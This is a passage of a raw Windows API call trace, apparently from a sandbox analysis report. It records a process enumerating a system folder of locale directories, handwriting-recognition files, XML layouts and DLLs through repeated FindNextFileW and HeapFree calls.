dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0048.032] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.032] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0048.032] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.032] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0048.034] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.034] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0048.035] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.035] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0048.035] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.035] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0048.035] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.035] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0048.035] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.035] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0048.035] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.035] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0048.035] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.036] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0048.036] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.036] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0048.037] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.037] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0048.037] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.037] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0048.161] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.161] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="main.xml", cAlternateFileName="")) returned 1 [0048.161] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.161] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0048.162] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.162] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0048.162] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.162] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0048.162] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.162] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0048.163] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.163] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0048.169] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0048.169] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0048.169] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.169] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0048.170] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.170] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0048.170] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.170] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0048.170] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.170] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0048.170] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.170] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0048.174] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.174] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0048.174] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x3cd0e58, Size=0x10000) returned 0x42e10a0 [0048.174] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.174] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0048.174] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.174] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0048.175] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.175] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0048.175] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.175] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0048.175] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.175] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0048.176] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.176] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0048.176] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.176] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0048.176] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.176] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0048.177] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.177] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0048.177] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.177] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0048.187] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.187] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0048.188] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.188] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0048.188] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.188] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0048.188] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.188] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, 